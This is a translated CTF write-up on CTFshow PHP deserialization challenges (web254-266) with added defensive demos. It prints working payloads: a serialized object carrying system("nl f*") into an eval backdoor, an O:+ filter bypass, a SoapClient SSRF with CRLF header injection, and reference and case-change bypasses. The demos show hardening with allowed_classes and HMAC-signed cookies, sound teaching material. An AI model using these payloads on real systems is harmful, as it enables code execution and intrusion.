[Original] CTFshow - Deserialization (254-278) (continuously updated)

Here comes the headache that is serialization; it brings back the dread of being at the mercy of code audits. Painful.

web254

?username=xxxxxx&password=xxxxxx

One small takeaway here: the difference between public function and a bare function declaration.

web255

Solution summary:

<?php
class ctfShowUser{
    public $isVip=true;
}
echo serialize(new ctfShowUser);

Output: O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}

URL-encoded payload:
GET: ?username=xxxxxx&password=xxxxxx
Cookie: user=O:11:"ctfShowUser":1:{s:5:"isVip"%3Bb:1%3B}

web256

Solution summary:

Everything else is the same as above.

<?php
class ctfShowUser{
    public $isVip=true;
    public $username='x';
}
echo serialize(new ctfShowUser);

Output: O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:1:"x";}

URL-encoded payload:
GET: ?username=x&password=xxxxxx
Cookie: user=O:11:"ctfShowUser":2:{s:5:"isVip"%3Bb:1%3Bs:8:"username"%3Bs:1:"x"%3B}

web257

Solution summary:

__construct is called automatically when an object is created and initializes it. Once all operations have finished, the unserialized object is released, which triggers the __destruct() magic method.

PHP 7.1+ unserialize() does not care about property visibility.

So when serializing locally, just change the original private properties to public and the check is bypassed.

See this article: https://hellohy.top/huayang/711.html

The idea: we spot the exploitable function eval. To reach eval we have to call getInfo in the backDoor class, and to get getInfo called, __destruct must run. After the magic method __construct() has done its work the unserialized object is eventually released, and __destruct runs once all references to the object are gone.

<?php
class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code='system("nl f*");';
}
$b=new ctfShowUser();
echo urlencode(serialize($b));

Output: O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22system%28%22nl+f%2A%22%29%3B%22%3B%7D%7D
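As an added illustration (my own demo, not code from the writeup or from CTFshow), the script below shows the two things this step relies on and the fix a defender would apply: on PHP 7.1+ a public-style property name in the serialized string lands in a declared private property, and __destruct of the rebuilt object fires as soon as the last reference goes away; passing allowed_classes to unserialize() turns the payload into __PHP_Incomplete_Class, so no class code runs at all. The class names Holder and Payload and the property inner are made up for the demo.

```php
<?php
// Added demo (not from the writeup). Run with: php demo.php

// A stand-in for the challenge's class, with a *private* property.
class Holder {
    private $inner = null;            // declared private on purpose
    public function __destruct() {
        // In the challenge this is where the chain continues (getInfo -> eval).
        // Here it only reports what it holds, so nothing dangerous runs.
        echo "Holder::__destruct fired, inner is ",
             is_object($this->inner) ? get_class($this->inner) : var_export($this->inner, true), "\n";
    }
}
class Payload {
    public $note = 'harmless';
}

// Constructed serialized string. Note the *public*-style name s:5:"inner",
// not the "\0Holder\0inner" form that serialize() emits for a private property.
$data = 'O:6:"Holder":1:{s:5:"inner";O:7:"Payload":1:{s:4:"note";s:8:"harmless";}}';

// 1) Unsafe: unserialize with no class restriction.
//    On PHP >= 7.1 (as the writeup says) the public-style name still populates the
//    private property, and __destruct runs the moment $obj is dropped.
$obj = unserialize($data);
var_dump(get_class($obj));          // string(6) "Holder"
unset($obj);                        // prints: Holder::__destruct fired, inner is Payload

// 2) Hardened: forbid every class. The object becomes __PHP_Incomplete_Class,
//    which has no user-defined __destruct, so the chain never starts.
$safe = unserialize($data, ['allowed_classes' => false]);
var_dump(get_class($safe));         // string(22) "__PHP_Incomplete_Class"
unset($safe);                       // nothing fires

// 3) If one class really must round-trip, whitelist only that class by name.
$partial = unserialize($data, ['allowed_classes' => ['Payload']]);
var_dump(get_class($partial));      // still __PHP_Incomplete_Class: Holder was not allowed
unset($partial);                    // nothing fires: the inner Payload has no __destruct
```

The allowed_classes option exists since PHP 7.0; on older versions the only safe choice is to not unserialize user-supplied data at all.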

web258

Now there is a filter.

In the filter's regex: [oc] matches one character from the set, \d matches a digit, + means one or more.

So it is enough to change the O: in the payload generated above to O:+ (unserialize() still accepts a + sign in front of the length, while the regex \d+ does not match it).

<?php
class ctfShowUser{
    public $class;
    public function __construct(){
        $this->class=new backDoor();
    }
}
class backDoor{
    public $code='system("nl f*");';
}
$b=new ctfShowUser();
echo urlencode(str_replace('O:', 'O:+',serialize($b)));
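Added demo (my own, not from the writeup): it shows why a regex denylist over the serialized string is fragile, and what a server does instead, namely signing the cookie it issues and verifying the signature before unserialize() ever runs. The regex /[oc]:\d+:/i is my assumption based on the description above; COOKIE_KEY, issue_cookie() and read_cookie() are demo names. Needs PHP 7.2+ for the ?object return type.

```php
<?php
// Added demo (not from the writeup). Run with: php demo.php

class ctfShowUser { public $class; }

// Assumed denylist, reconstructed from the "[oc] \d +" description.
function denylist_blocks(string $s): bool {
    return preg_match('/[oc]:\d+:/i', $s) === 1;
}

$plain   = serialize(new ctfShowUser());        // O:11:"ctfShowUser":1:{...}
$variant = str_replace('O:', 'O:+', $plain);     // O:+11:"ctfShowUser":1:{...}

var_dump(denylist_blocks($plain));     // bool(true)  : caught
var_dump(denylist_blocks($variant));   // bool(false) : slips past the regex ...
var_dump(unserialize($variant));       // ... yet PHP still rebuilds the object

// Hardened alternative: never accept an unsigned serialized blob.
// The server signs what it issues and checks the MAC before unserialize().
const COOKIE_KEY = 'replace-with-a-random-32-byte-secret';   // demo secret (constructed)

function issue_cookie(object $o): string {
    $payload = base64_encode(serialize($o));
    $mac = hash_hmac('sha256', $payload, COOKIE_KEY);
    return $payload . '.' . $mac;
}

function read_cookie(string $cookie): ?object {
    $parts = explode('.', $cookie, 2);
    if (count($parts) !== 2) return null;
    [$payload, $mac] = $parts;
    // Constant-time comparison so MAC checking does not leak timing information.
    if (!hash_equals(hash_hmac('sha256', $payload, COOKIE_KEY), $mac)) return null;
    // Even with a valid MAC, only the one class we expect may be rebuilt.
    return unserialize(base64_decode($payload), ['allowed_classes' => ['ctfShowUser']]);
}

$good = issue_cookie(new ctfShowUser());
var_dump(read_cookie($good) instanceof ctfShowUser);   // bool(true)

// Any edit to the payload (here the same O:+ trick) invalidates the MAC.
[$p, $m] = explode('.', $good, 2);
$tampered = base64_encode(str_replace('O:', 'O:+', base64_decode($p))) . '.' . $m;
var_dump(read_cookie($tampered));                      // NULL
```

With a MAC in place the regex becomes unnecessary: the question is no longer "does this string look dangerous" but "did we produce this string", which a tampered cookie can never satisfy without the key.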

web259

This one is too hard for me, so here is 羽师傅's solution:

<?php
$target = 'http://127.0.0.1/flag.php';
$post_string = 'token=ctfshow';
$b = new SoapClient(null,array('location' => $target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type: application/x-www-form-urlencoded'.'^^Content-Length: '.(string)strlen($post_string).'^^^^'.$post_string,'uri'=> "ssrf"));
$a = serialize($b);
$a = str_replace('^^',"\r\n",$a);
echo urlencode($a);
?>

Output: O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A4%3A%22ssrf%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A128%3A%22wupco%0D%0AX-Forwarded-For%3A127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

First submit the payload and visit the page once to trigger it.

Then visit /flag.txt

Recommended write-ups: 羽师傅, Y4tacker

web260

After serialization:

web262

You can tell it is a string-escape (字符逃逸) challenge, but I just don't know how to solve it.

Harder than the first problem of the Mooncake Cup (月饼杯).

If you haven't studied this before, see: https://hellohy.top/huayang/981.html

web265

Use a reference.

<?php
class ctfshowAdmin{
    public function login(){
        return $this->token===$this->password;
    }
}
$a = new ctfshowAdmin();
$a->password=&$a->token; # reference
echo urlencode(serialize($a));
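Added demo (my own, not from the writeup) showing what the reference actually does in the serialized string, why login() then passes whatever token the server assigns, and a comparison that attacker-controlled data cannot satisfy. The declared properties username/password/token and the function login_hardened() are my additions; the challenge code only shows login().

```php
<?php
// Added demo (not from the writeup). Run with: php demo.php

class ctfshowAdmin {
    public $username;
    public $password;
    public $token;
    public function login() {
        // Both operands live inside the unserialized object, so the client controls both.
        return $this->token === $this->password;
    }
}

$a = new ctfshowAdmin();
$a->password = &$a->token;        // password now aliases token
$s = serialize($a);
echo $s, "\n";
// O:12:"ctfshowAdmin":3:{s:8:"username";N;s:8:"password";N;s:5:"token";R:3;}
// R:3; means "reference to value slot 3" (the object is slot 1, username 2, password 3).
// serialize() records the alias and unserialize() restores it as a real PHP reference.

$obj = unserialize($s);
$obj->token = bin2hex(random_bytes(16));   // whatever the server assigns as the token ...
var_dump($obj->login());                    // bool(true): password follows token through the alias

// Hardened: compare against a value that is NOT part of the client-supplied object,
// e.g. the token the server stored in its own session or database.
function login_hardened(ctfshowAdmin $u, string $server_token): bool {
    $supplied = is_string($u->password) ? $u->password : '';
    return hash_equals($server_token, $supplied);   // constant-time string compare
}

$server_token = bin2hex(random_bytes(16));
var_dump(login_hardened($obj, $server_token));      // bool(false): aliasing buys nothing here
$obj->password = $server_token;
var_dump(login_hardened($obj, $server_token));      // bool(true) only with the real token
```

The fix is not about references specifically: any check whose two sides both come out of unserialize() can be made to agree by the party who built the string.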

web266

<?php
class ctfshow{}
$a=new ctfshow();
echo strtoupper(serialize($a));

Output: O:7:"CTFSHOW":0:{}

Wrap it in strtoupper to bypass the regex; PHP class names are case-insensitive, so unserialize() still resolves CTFSHOW to ctfshow.

There is no parameter to pass in the URL, so send it with Burp instead.